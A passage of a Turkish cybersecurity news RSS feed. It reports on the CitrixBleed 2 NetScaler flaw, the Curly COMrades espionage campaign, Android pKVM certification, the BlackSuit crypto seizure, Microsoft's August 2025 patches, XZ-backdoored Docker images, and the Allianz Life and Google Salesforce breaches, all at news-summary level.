            <description><![CDATA[ Shadowserver Foundation’ın raporuna göre, CVE-2025-5777 kodlu “CitrixBleed 2” açığına karşı yamalar yayımlanmasının üzerinden iki ay geçmesine rağmen binlerce NetScaler cihazı hâlâ savunmasız durumda. Açık, saldırganların kimlik doğrulamayı atlatıp kullanıcı oturumlarını ele geçirmesine ve MFA’yı aşmasına imkân tanıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a451e754a1b.webp" length="52456" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:31 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>CitrixBleed 2 açığı saldırganlara hangi imkânları veriyor, dünya genelinde kaç cihaz savunmasız durumda, Hollanda’da hangi kurumlar etkilendi, CISA bu açıklarla ilgili hangi adımları zorunlu tuttu</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="481" data-end="804"><strong data-start="481" data-end="523">Kritik açığa karşı cihazlar savunmasız</strong><br data-start="523" data-end="526">Citrix NetScaler cihazlarında tespit edilen CVE-2025-5777 (CitrixBleed 2) açığı, yetersiz girdi doğrulaması nedeniyle oluşan “out-of-bounds memory read” hatasından kaynaklanıyor. Hedef alınan cihazlar arasında VPN, ICA Proxy, CVPN, RDP Proxy ve AAA sanal sunucuları bulunuyor.</p>
<p data-start="806" data-end="1141"><strong data-start="806" data-end="834">Oturum ele geçirme riski</strong><br data-start="834" data-end="837">Açık, saldırganlara oturum belirteçleri, kimlik bilgileri ve hassas verileri çalma imkânı tanıyor. Böylece kullanıcı oturumlarını ele geçirerek çok faktörlü kimlik doğrulamayı atlatabiliyorlar. Açık ilk olarak sıfır gün saldırılarında istismar edildi, kısa süre sonra da PoC exploit kodları yayımlandı.</p>
<p data-start="1143" data-end="1421"><strong data-start="1143" data-end="1173">Hâlâ binlerce cihaz açıkta</strong><br data-start="1173" data-end="1176">Shadowserver’ın 11 Ağustos raporuna göre dünya genelinde 3.312 cihaz hâlâ CVE-2025-5777’e karşı korunmasız. Ayrıca 4.142 cihaz, DoS saldırılarında aktif olarak istismar edilen başka bir kritik açık (CVE-2025-6543) için de yamalanmamış durumda.</p>
<p data-start="1423" data-end="1829"><strong data-start="1423" data-end="1467">Hollanda’da kritik kurumlar hedef alındı</strong><br data-start="1467" data-end="1470">Hollanda Ulusal Siber Güvenlik Merkezi (NCSC), CVE-2025-6543 açığının Mayıs ayından bu yana sıfır gün olarak kullanıldığını, kritik kuruluşların saldırıya uğradığını ve izlerin saldırganlar tarafından silindiğini duyurdu. Temmuz ayında Hollanda Savcılığı’nın (Openbaar Ministerie) saldırı sonrası e-posta sunucularında haftalarca kesinti yaşadığı açıklandı.</p>
<p data-start="1831" data-end="2110"><strong data-start="1831" data-end="1866">ABD kurumlarına zorunlu talimat</strong><br data-start="1866" data-end="1869">ABD Siber Güvenlik ve Altyapı Güvenliği Ajansı (CISA), iki açığı da aktif istismar edilen zafiyetler listesine ekleyerek federal kurumlara CVE-2025-5777 için 1 gün, CVE-2025-6543 için ise 21 Temmuz’a kadar yamaları uygulama talimatı verdi.</p>
<p data-start="2112" data-end="2327"><strong data-start="2112" data-end="2124"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Curly COMrades siber casusluk grubu, Gürcistan ve Moldova’daki devlet kurumlarını özel geliştirilmiş MucorAgent zararlısıyla hedef aldı</title>
            <link>https://cumha.com.tr/curly-comrades-siber-casusluk-grubu-gurcistan-ve-moldovadaki-devlet-kurumlarini-oezel-gelistirilmis-mucoragent-zararlisiyla-hedef-aldi</link>
            <guid>https://cumha.com.tr/curly-comrades-siber-casusluk-grubu-gurcistan-ve-moldovadaki-devlet-kurumlarini-oezel-gelistirilmis-mucoragent-zararlisiyla-hedef-aldi</guid>
            <description><![CDATA[ Bitdefender’ın raporuna göre Rusya’nın çıkarlarıyla uyumlu faaliyetler yürüten Curly COMrades adlı yeni tehdit grubu, 2024’ten bu yana hükümet ve enerji sektörünü hedef alıyor. Grup, .NET tabanlı üç aşamalı MucorAgent arka kapısını, COM nesne ele geçirmeyi ve curl.exe tabanlı veri sızdırma yöntemlerini kullanarak sistemlere kalıcı erişim sağlıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a452068b50d.webp" length="43262" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:30 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Curly COMrades grubu hangi ülkelerdeki kurumları hedef aldı, MucorAgent arka kapısı nasıl çalışıyor, saldırganlar kimlik bilgilerini ele geçirmek için hangi yöntemleri kullandı, kalıcılığı nasıl sağladılar</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="545" data-end="920"><strong data-start="545" data-end="587">Rusya çıkarlarıyla uyumlu operasyonlar</strong><br data-start="587" data-end="590">Bitdefender araştırmacıları, Curly COMrades adını verdikleri yeni bir siber casusluk grubunun Gürcistan’daki devlet ve yargı kurumlarını, Moldova’daki enerji şirketlerini hedef aldığını açıkladı. Grup, bilinen APT’lerle doğrudan örtüşmese de operasyonlarının Rusya’nın jeopolitik hedefleriyle paralellik gösterdiği ifade edildi.</p>
<p data-start="922" data-end="1303"><strong data-start="922" data-end="948">MucorAgent arka kapısı</strong><br data-start="948" data-end="951">Grubun saldırılarında kullandığı MucorAgent zararlısı üç aşamalı yapıya sahip. İlk aşamada COM nesneleri ele geçirilerek ikinci aşama yükleniyor; bu bileşen Windows’un Antimalware Scan Interface (AMSI) korumasını atlatıyor. Üçüncü aşama ise belirli dizinlerde bulunan şifrelenmiş PNG dosyalarındaki verileri (muhtemelen komut dosyaları) çalıştırıyor.</p>
<p data-start="1305" data-end="1669"><strong data-start="1305" data-end="1346">Kalıcı erişim için yaratıcı yöntemler</strong><br data-start="1346" data-end="1349">Araştırmacılar, saldırganların NGEN (Native Image Generator) bileşenini hedef alarak devre dışı görünen ancak belirli durumlarda çalışan zamanlanmış görevleri kötüye kullandığını tespit etti. Ayrıca, Resocks proxy aracı, SOCKS5 sunucuları, SSH + Stunnel tünelleme ve CurlCat gibi özel geliştirilmiş araçlar kullanıldı.</p>
<p data-start="1671" data-end="2046"><strong data-start="1671" data-end="1713">Hedef: Kimlik bilgileri ve ağ hareketi</strong><br data-start="1713" data-end="1716">Saldırganların etki alanı denetleyicilerinden NTDS veritabanını ve LSASS bellek dökümlerini çıkarmaya çalıştığı, ağda kalıcı erişim için geçerli kimlik bilgilerini toplamaya odaklandığı belirtildi. Ayrıca netstat, tasklist, systeminfo, wmic, ipconfig gibi komutlar ve Active Directory keşfi için PowerShell betikleri kullanıldı.</p>
<p data-start="2048" data-end="2324"><strong data-start="2048" data-end="2084">Gizlilik çabaları sonuçsuz kaldı</strong><br data-start="2084" data-end="2087">Curly COMrades’in “living-off-the-land” teknikleri, açık kaynak araçları ve yoğun COM manipülasyonlarıyla gizlilik sağlamaya çalıştığı, ancak modern EDR/XDR sistemlerinin bu faaliyetleri tespit edecek kadar gürültü oluştuğu kaydedildi.</p>
<p data-start="2326" data-end="2550"><strong data-start="2326" data-end="2338"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Android’in pKVM hipervizörü, en yüksek güvenlik seviyesi olan SESIP Level 5 sertifikasını aldı</title>
            <link>https://cumha.com.tr/androidin-pkvm-hipervizoeru-en-yuksek-guvenlik-seviyesi-olan-sesip-level-5-sertifikasini-aldi</link>
            <guid>https://cumha.com.tr/androidin-pkvm-hipervizoeru-en-yuksek-guvenlik-seviyesi-olan-sesip-level-5-sertifikasini-aldi</guid>
            <description><![CDATA[ Google, Android Virtualization Framework’ün temelini oluşturan korumalı KVM (pKVM) hipervizörünün SESIP Level 5 sertifikası kazandığını açıkladı. Bu sertifika, pKVM’yi tüketici elektroniğinde geniş ölçekli dağıtım için en yüksek güvenlik standardını karşılayan ilk yazılım güvenlik sistemi haline getirdi. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a4521ad681b.webp" length="44688" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:29 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>pKVM hipervizörü hangi güvenlik sertifikasını aldı, SESIP Level 5 kullanıcılar için ne anlama geliyor, pKVM Android cihazlarda hangi görevlerde kullanılıyor, Google bu gelişmeyi neden kritik görüyor</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="460" data-end="730"><strong data-start="460" data-end="492">En yüksek güvenlik standardı</strong><br data-start="492" data-end="495">pKVM, Android cihazlarda sanallaştırma çerçevesinin çekirdeğini oluşturan hipervizör. Google, sistemin DEKRA tarafından akredite laboratuvarlarda test edildiğini ve gelişmiş tehditlere karşı dirençli olduğunun doğrulandığını duyurdu.</p>
<p data-start="732" data-end="1060"><strong data-start="732" data-end="755">SESIP Level 5 nedir</strong><br data-start="755" data-end="758">SESIP (Security Evaluation Standard for IoT Platforms), IoT ve mobil platformlar için geliştirilen bir güvenlik standardı. Level 5, Common Criteria’nin (ISO 15408) en yüksek güvenlik seviyesi olan AVA_VAN.5’e eşdeğer. Bu seviye, pKVM’nin sofistike saldırılara karşı dayanıklı olduğunu ortaya koyuyor.</p>
<p data-start="1062" data-end="1205"><strong data-start="1062" data-end="1092">pKVM’nin kullanım alanları</strong><br data-start="1092" data-end="1095">Hipervizör, Android cihazlarda kritik görevlerin güvenli şekilde çalıştırılmasını sağlıyor. Bunlar arasında:</p>
<ul data-start="1206" data-end="1447">
<li data-start="1206" data-end="1291">
<p data-start="1208" data-end="1291">Google’ın Gemini Nano gibi yapay zekâ modellerinin cihaz üzerinde çalıştırılması,</p>
</li>
<li data-start="1292" data-end="1342">
<p data-start="1294" data-end="1342">biyometrik kimlik doğrulama (yüz, parmak izi),</p>
</li>
<li data-start="1343" data-end="1382">
<p data-start="1345" data-end="1382">DRM korumalı içeriklerin işlenmesi,</p>
</li>
<li data-start="1383" data-end="1447">
<p data-start="1385" data-end="1447">cihazın firmware düzeyinde güvenlik fonksiyonları bulunuyor.</p>
</li>
</ul>
<p data-start="1449" data-end="1811"><strong data-start="1449" data-end="1477">Kullanıcılar için anlamı</strong><br data-start="1477" data-end="1480">Google’a göre akıllı telefonlar artık yalnızca kişisel bilgileri değil, aynı zamanda yapay zekâ modelleriyle işlenen yüksek değerli verileri de barındırıyor. Bu da saldırganlar için cazip bir hedef oluşturuyor. SESIP Level 5 sertifikası, Android cihazlarda bu verilerin güvenliğinin daha üst düzeyde sağlanacağı anlamına geliyor.</p>
<p data-start="1813" data-end="2079"><strong data-start="1813" data-end="1836">Google’dan açıklama</strong><br data-start="1836" data-end="1839">Android Güvenlik ve Gizlilik Başkan Yardımcısı Dave Kleidermacher, “Cihaz üzerinde yapılan işlemeler arttıkça, kişisel veriler daha değerli hale geliyor. Bu nedenle güçlü güvenlik önlemleri zorunlu” diyerek sertifikanın önemini vurguladı.</p>
<p data-start="2081" data-end="2298"><strong data-start="2081" data-end="2093"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>ABD, BlackSuit fidye yazılımı çetesinden 1 milyon dolarlık kripto varlığı ele geçirdi</title>
            <link>https://cumha.com.tr/abd-blacksuit-fidye-yazilimi-cetesinden-1-milyon-dolarlik-kripto-varligi-ele-gecirdi</link>
            <guid>https://cumha.com.tr/abd-blacksuit-fidye-yazilimi-cetesinden-1-milyon-dolarlik-kripto-varligi-ele-gecirdi</guid>
            <description><![CDATA[ ABD Adalet Bakanlığı, BlackSuit fidye yazılımı grubuna yapılan fidye ödemesinden kaynaklanan 1 milyon doların üzerinde kripto varlığı ele geçirdiğini duyurdu. Operasyon, grubun karanlık ağ üzerindeki gasp portallarının kapatıldığı “Operation Checkmate” hamlesinin ardından geldi. BlackSuit ve Royal çetelerinin 2022’den bu yana 450’den fazla ABD kuruluşunu hedef alarak 370 milyon doların üzerinde fidye kazancı sağladığı biliniyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a4523bbdb11.webp" length="56816" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:28 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>BlackSuit çetesinden ele geçirilen kripto para hangi fidye ödemesinden kaynaklanıyor, Operation Checkmate kapsamında hangi adımlar atıldı, Royal ve BlackSuit bugüne kadar kaç saldırı gerçekleştirdi, suçtan elde edilen gelirlere el koymanın önemi nedir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="578" data-end="956"><strong data-start="578" data-end="619">1 milyon dolarlık kriptoya el konuldu</strong><br data-start="619" data-end="622">ABD Adalet Bakanlığı, BlackSuit fidye yazılımı grubuna ait dijital varlıkların 9 Ocak 2024’te ele geçirildiğini açıkladı. Söz konusu varlıkların değeri 1.091.453 dolar olarak açıklandı. Kripto paralar, suçlular tarafından farklı borsalar üzerinden defalarca transfer edilerek izleri gizlenmeye çalışılırken tespit edilip donduruldu.</p>
<p data-start="958" data-end="1185"><strong data-start="958" data-end="993">Fidye ödemesinden kaynaklanıyor</strong><br data-start="993" data-end="996">Yetkililere göre el konulan varlıklar, 4 Nisan 2023’te fidye ödemesi yapan bir kurbanın gönderdiği 49,3 Bitcoin’den elde edildi. O dönemde bu ödemenin değeri yaklaşık 1,44 milyon dolardı.</p>
<p data-start="1187" data-end="1466"><strong data-start="1187" data-end="1225">Operation Checkmate ile bağlantılı</strong><br data-start="1225" data-end="1228">Bu duyuru, uluslararası “Operation Checkmate” operasyonu kapsamında BlackSuit’in gasp sitelerinin ele geçirilmesinin ardından geldi. Operasyon, BlackSuit ile bağlantılı Royal, Quantum ve Chaos fidye yazılım platformlarını da hedef aldı.</p>
<p data-start="1468" data-end="1774"><strong data-start="1468" data-end="1503">ABD’de 450 kuruluşa saldırdılar</strong><br data-start="1503" data-end="1506">Geçen hafta ABD İç Güvenlik Bakanlığı, Royal ve BlackSuit çetelerinin sağlık, eğitim, enerji, kamu güvenliği ve devlet kurumları dahil 450’den fazla ABD kuruluşunu hedef aldığını açıkladı. Bu saldırılardan toplam 370 milyon dolar değerinde fidye ödemesi elde edildi.</p>
<p data-start="1776" data-end="1964"><strong data-start="1776" data-end="1816">Daha önce 20 Bitcoin’e el konulmuştu</strong><br data-start="1816" data-end="1819">28 Temmuz’da FBI Dallas, Chaos fidye yazılımı grubuyla bağlantılı bir adreste 20 Bitcoin’e (yaklaşık 2,4 milyon dolar) el koyduğunu duyurmuştu.</p>
<p data-start="1966" data-end="2212"><strong data-start="1966" data-end="1997">Stratejik öneme sahip hamle</strong><br data-start="1997" data-end="2000">Adalet Bakanlığı, suçtan elde edilen gelirlerin ele geçirilmesinin, yakalanamayan operatörlerin finansal gücünü kırmak ve altyapılarını yeniden kurmalarını engellemek için kritik öneme sahip olduğunu vurguladı.</p>
<p data-start="2214" data-end="2484"><strong data-start="2214" data-end="2226"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Microsoft Ağustos 2025 güvenlik güncellemeleri: 1 sıfır gün ve 107 güvenlik açığı kapatıldı</title>
            <link>https://cumha.com.tr/microsoft-agustos-2025-guvenlik-guncellemeleri-1-sifir-gun-ve-107-guvenlik-acigi-kapatildi</link>
            <guid>https://cumha.com.tr/microsoft-agustos-2025-guvenlik-guncellemeleri-1-sifir-gun-ve-107-guvenlik-acigi-kapatildi</guid>
            <description><![CDATA[ Microsoft, Ağustos 2025 Patch Tuesday kapsamında 107 güvenlik açığına yönelik güncelleme yayımladı. Güncellemeler arasında, saldırganların domain yöneticisi yetkisi elde etmesine yol açabilecek Windows Kerberos sıfır gün açığı da yer alıyor. 13 kritik açık ise uzaktan kod çalıştırma ve yetki yükseltme riskleri taşıyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a4525636b34.webp" length="39608" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:27 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Microsoft’un Ağustos 2025 güncellemesinde kaç açık kapatıldı, hangi sıfır gün açığı giderildi, kritik RCE açıkları hangi ürünlerde bulundu, kullanıcılar hangi yamaları önceliklendirmeli</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="472" data-end="720"><strong data-start="472" data-end="511">Toplam 107 güvenlik açığı kapatıldı</strong><br data-start="511" data-end="514">Microsoft’un bu ay yayımladığı yama paketi 44 yetki yükseltme, 35 uzaktan kod yürütme, 18 bilgi ifşası, 4 hizmet reddi ve 9 sahtecilik açığını gideriyor. Bu açıkların 13’ü “kritik” olarak sınıflandırıldı.</p>
<p data-start="722" data-end="1022"><strong data-start="722" data-end="753">Kerberos’ta sıfır gün açığı</strong><br data-start="753" data-end="756">En dikkat çekici güncelleme, CVE-2025-53779 kodlu Windows Kerberos açığı oldu. Bu açık, doğrulanmış bir saldırganın domain yöneticisi ayrıcalıkları elde etmesine imkân tanıyor. Açığın teknik detayları Mayıs 2025’te Akamai’den Yuval Gordon tarafından yayımlanmıştı.</p>
<p data-start="1024" data-end="1368"><strong data-start="1024" data-end="1063">Kritik uzaktan kod yürütme açıkları</strong><br data-start="1063" data-end="1066">Düzeltmeler arasında Microsoft Office (Word, Excel, PowerPoint, Visio), SharePoint, SQL Server, Windows GDI+ ve Message Queuing bileşenlerinde kritik seviyede RCE açıkları da bulunuyor. Bu açıklar, saldırganların kullanıcı etkileşimi olmadan sistem üzerinde zararlı kod çalıştırmasına yol açabiliyor.</p>
<p data-start="1370" data-end="1399"><strong data-start="1370" data-end="1397">Öne çıkan diğer yamalar</strong></p>
<ul data-start="1400" data-end="1701">
<li data-start="1400" data-end="1529">
<p data-start="1402" data-end="1529"><strong data-start="1402" data-end="1422">Exchange Server:</strong> CVE-2025-53786, hibrit kurulumlarda bulut ortamına yetkisiz erişim sağlayabilecek yetki yükseltme açığı.</p>
</li>
<li data-start="1530" data-end="1584">
<p data-start="1532" data-end="1584"><strong data-start="1532" data-end="1549">Windows NTLM:</strong> Kritik yetki yükseltme zafiyeti.</p>
</li>
<li data-start="1585" data-end="1646">
<p data-start="1587" data-end="1646"><strong data-start="1587" data-end="1599">Hyper-V:</strong> Hem DoS hem de uzaktan kod yürütme açıkları.</p>
</li>
<li data-start="1647" data-end="1701">
<p data-start="1649" data-end="1701"><strong data-start="1649" data-end="1669">Microsoft Teams:</strong> Uzaktan kod çalıştırma açığı.</p>
</li>
</ul>
<p data-start="1703" data-end="1983"><strong data-start="1703" data-end="1740">Diğer üretici yamalarıyla paralel</strong><br data-start="1740" data-end="1743">Ağustos güncellemeleri, son haftalarda diğer üreticilerden gelen yamaları da takip ediyor. 7-Zip, Adobe, Cisco, Fortinet, Google (Android), SAP ve Trend Micro da aktif olarak istismar edilen açıklar için güvenlik güncellemeleri yayımladı.</p>
<p data-start="1985" data-end="2214"><strong data-start="1985" data-end="2006">Uzmanlardan öneri</strong><br data-start="2006" data-end="2009">Siber güvenlik uzmanları, özellikle Kerberos açığı ve Office ürünlerindeki RCE açıklarının kurumlar için ciddi risk oluşturduğunu belirterek güncellemelerin gecikmeden uygulanması gerektiğini vurguluyor.</p>
<p data-start="2216" data-end="2420"><strong data-start="2216" data-end="2228"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Docker Hub’da hâlâ XZ arka kapısı içeren onlarca Linux imajı indirilebilir durumda</title>
            <link>https://cumha.com.tr/docker-hubda-hala-xz-arka-kapisi-iceren-onlarca-linux-imaji-indirilebilir-durumda</link>
            <guid>https://cumha.com.tr/docker-hubda-hala-xz-arka-kapisi-iceren-onlarca-linux-imaji-indirilebilir-durumda</guid>
            <description><![CDATA[ Mart 2024’te keşfedilen ve CVE-2024-3094 olarak izlenen XZ-Utils arka kapısı, araştırmacılara göre bugün hâlâ en az 35 Docker Hub imajında bulunuyor. Debian, güvenlik risklerine rağmen bu imajları kaldırmak yerine “tarihsel kayıt” amacıyla erişime açık bırakma kararı aldı. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a4526859f51.webp" length="82092" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:26 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>XZ-Utils arka kapısı hangi Linux imajlarını etkiliyor, saldırgan bu açığı nasıl kullanabiliyor, Debian neden imajları kaldırmadı, kullanıcılar kendilerini nasıl koruyabilir</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="416" data-end="675"><strong data-start="416" data-end="449">Tehlike Docker Hub’da sürüyor</strong><br data-start="449" data-end="452">Binarly araştırmacıları, Docker Hub’da barındırılan en az 35 Linux imajında XZ-Utils arka kapısının hâlâ bulunduğunu tespit etti. Bu imajların bazıları, üzerinde inşa edilen yeni imajları da dolaylı olarak enfekte ediyor.</p>
<p data-start="677" data-end="1002"><strong data-start="677" data-end="707">XZ-Utils arka kapısı nedir</strong><br data-start="707" data-end="710">XZ-Utils sıkıştırma aracının 5.6.0 ve 5.6.1 sürümlerinde tespit edilen arka kapı, <code data-start="792" data-end="804">liblzma.so</code> kütüphanesine gizlenmişti. Kod, OpenSSH’deki <code data-start="850" data-end="870">RSA_public_decrypt</code> fonksiyonunu ele geçiriyor ve özel bir anahtara sahip saldırganın SSH üzerinden root yetkisiyle giriş yapmasına olanak tanıyordu.</p>
<p data-start="1004" data-end="1280"><strong data-start="1004" data-end="1034">Debian imajları kaldırmadı</strong><br data-start="1034" data-end="1037">Araştırmacıların uyarılarına rağmen Debian, 64 bitlik bazı imajları Docker Hub’dan çekmediğini doğruladı. Gerekçe olarak, istismarın düşük ihtimalle gerçekleşebileceği ve eski imajların “tarihsel arşiv” olarak korunması gerektiği belirtildi.</p>
<p data-start="1282" data-end="1483"><strong data-start="1282" data-end="1309">Risk halen devam ediyor</strong><br data-start="1309" data-end="1312">Binarly, bu yaklaşımın yanlış olduğunu ve bu imajların kamuya açık tutulmasının, otomatik yapılar veya yanlışlıkla indirmeler yoluyla ciddi risk oluşturduğunu vurguladı.</p>
<p data-start="1485" data-end="1724"><strong data-start="1485" data-end="1510">Kullanıcılara tavsiye</strong><br data-start="1510" data-end="1513">Uzmanlar, kullanılan imajların manuel olarak kontrol edilmesi ve XZ-Utils’in en az 5.6.2 sürümüne güncellenmiş olduğunun doğrulanması gerektiğini hatırlatıyor. En güncel sürüm 5.8.1 olarak yayımlanmış durumda.</p>
<p data-start="1726" data-end="1917"><strong data-start="1726" data-end="1738"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Allianz Life veri ihlali: 2,8 milyon müşteri ve iş ortağı kaydı hackerlar tarafından sızdırıldı</title>
            <link>https://cumha.com.tr/allianz-life-veri-ihlali-28-milyon-musteri-ve-is-ortagi-kaydi-hackerlar-tarafindan-sizdirildi</link>
            <guid>https://cumha.com.tr/allianz-life-veri-ihlali-28-milyon-musteri-ve-is-ortagi-kaydi-hackerlar-tarafindan-sizdirildi</guid>
            <description><![CDATA[ ABD’nin önde gelen sigorta şirketlerinden Allianz Life’a ait Salesforce sistemlerinden çalınan veriler çevrim içi yayınlandı. ShinyHunters, Scattered Spider ve Lapsus$ bağlantılı hackerların üstlendiği saldırıda 2,8 milyon kayıtta isim, adres, telefon, doğum tarihi, vergi kimlik numarası ve finansal danışmanlık bilgileri gibi hassas veriler ifşa oldu. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a45275d2685.webp" length="51056" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:25 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Allianz Life saldırısında kaç kayıt sızdırıldı, hangi bilgiler ifşa oldu, saldırganlar hangi yöntemle Salesforce’a erişim sağladı, ShinyHunters ve Scattered Spider arasında nasıl bir bağlantı var</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="509" data-end="829"><strong data-start="509" data-end="538">Veri sızıntısı doğrulandı</strong><br data-start="538" data-end="541">Allianz Life, Temmuz 2025’te CRM sistemlerinden büyük çaplı bir veri hırsızlığı yaşadığını açıklamıştı. Hafta sonu itibarıyla ShinyHunters grubu, çalınan “Accounts” ve “Contacts” veritabanı tablolarını internette yayımladı. Bu tablolar, 2,8 milyon müşteri ve iş ortağı kaydını içeriyor.</p>
<p data-start="831" data-end="1153"><strong data-start="831" data-end="858">Hangi veriler ifşa oldu</strong><br data-start="858" data-end="861">Sızdırılan dosyalarda kişisel bilgiler (isim, adres, telefon numarası, doğum tarihi, vergi kimlik numarası) ile mesleki bilgiler (lisanslar, kurum bağlantıları, ürün onayları ve pazarlama sınıflandırmaları) yer alıyor. BleepingComputer, verilerin doğruluğunu etkilenen kişilerle teyit etti.</p>
<p data-start="1155" data-end="1433"><strong data-start="1155" data-end="1177">Saldırının yöntemi</strong><br data-start="1177" data-end="1180">2025’in başında başlayan saldırı dalgasında tehdit aktörleri, çalışanları kandırarak şirketlerin Salesforce sistemlerine kötü amaçlı OAuth uygulamaları bağlatıyor. Bu bağlantılar üzerinden veritabanlarını indirip şirketlere fidye talebi gönderiyorlar.</p>
<p data-start="1435" data-end="1760"><strong data-start="1435" data-end="1467">Hacker gruplarının birleşimi</strong><br data-start="1467" data-end="1470">ShinyHunters, saldırının ardından yaptığı açıklamada Scattered Spider ile tek grup olduklarını duyurdu. Grup, daha önce Snowflake saldırısında da benzer yöntemlerle veri çalmıştı. Araştırmacılar, Lapsus$ grubunun eski üyelerinin de bu saldırılarda rol almış olabileceğini değerlendiriyor.</p>
<p data-start="1762" data-end="2000"><strong data-start="1762" data-end="1785">Allianz Life sessiz</strong><br data-start="1785" data-end="1788">Şirket, devam eden soruşturmayı gerekçe göstererek sızdırılan veriler hakkında yorum yapmadı. Ancak uzmanlar, ifşa edilen verilerin kimlik hırsızlığı ve dolandırıcılık risklerini artırdığı uyarısında bulunuyor.</p>
<p data-start="2002" data-end="2216"><strong data-start="2002" data-end="2014"></strong></p>
<p></p>
<p><b>Kaynak: CUMHA - CUMHUR HABER AJANSI</b></p>]]>
                                    </content:encoded>
                    </item>
                        <item>
            <title>Google, ShinyHunters grubunun Salesforce tabanlı veri hırsızlığı saldırısında müşteri verilerinin sızdırıldığını doğruladı</title>
            <link>https://cumha.com.tr/google-shinyhunters-grubunun-salesforce-tabanli-veri-hirsizligi-saldirisinda-musteri-verilerinin-sizdirildigini-dogruladi</link>
            <guid>https://cumha.com.tr/google-shinyhunters-grubunun-salesforce-tabanli-veri-hirsizligi-saldirisinda-musteri-verilerinin-sizdirildigini-dogruladi</guid>
            <description><![CDATA[ Google, Haziran 2025’te bir Salesforce CRM sisteminin ShinyHunters tarafından ele geçirildiğini ve küçük-orta ölçekli işletmelere ait iletişim bilgileri ile notların çalındığını açıkladı. Şirket, verilerin büyük ölçüde kamuya açık bilgilerden oluştuğunu belirtirken, saldırı hâlen diğer büyük markaları da hedef almaya devam ediyor. ]]></description>

                            <enclosure url="https://cumha.com.tr/uploads/images/202508/image_870x_68a452b31ab6d.webp" length="58734" type="image/webp"/>
            
            <pubDate>Mon, 18 Aug 2025 12:09:24 +0300</pubDate>
            <dc:creator>Ebubekir Bastama</dc:creator>
            <media:keywords>Google veri ihlalinde hangi bilgiler çalındı, saldırıyı hangi grup üstlendi, ShinyHunters şirketlerden nasıl fidye talep ediyor, bu kampanyada başka hangi firmalar etkilendi</media:keywords>

                            <content:encoded>
                                            <![CDATA[<p></p>
<p data-start="515" data-end="795"><strong data-start="515" data-end="545">Google da saldırıya uğradı</strong><br data-start="545" data-end="548">Google, dün gece yaptığı güncellemede Haziran ayında şirketin bir Salesforce CRM örneğinin ShinyHunters tarafından hedef alındığını doğruladı. Saldırıda küçük ve orta ölçekli işletmelere ait iletişim bilgileri ve notların indirildiği belirtildi.</p>
<p data-start="797" data-end="1047"><strong data-start="797" data-end="838">Veriler sınırlı ama risk devam ediyor</strong><br data-start="838" data-end="841">Google’ın açıklamasına göre çalınan veriler esasen işletme adı ve iletişim bilgileri gibi büyük ölçüde kamuya açık bilgilerden oluşuyor. Ancak saldırı, müşteri güvenliği açısından dikkat çekici bulunuyor.</p>
<p data-start="1049" data-end="1358"><strong data-start="1049" data-end="1087">ShinyHunters kampanyası genişliyor</strong><br data-start="1087" data-end="1090">ShinyHunters, yıllardır Oracle Cloud, Snowflake, AT&amp;T, Wattpad, MathWay gibi kurumlara yönelik saldırılarla biliniyor. Grup, son dönemde Adidas, Qantas, Allianz Life, Cisco, Louis Vuitton, Dior ve Tiffany &amp; Co. gibi şirketlerin Salesforce sistemlerini de hedef aldı.</p>
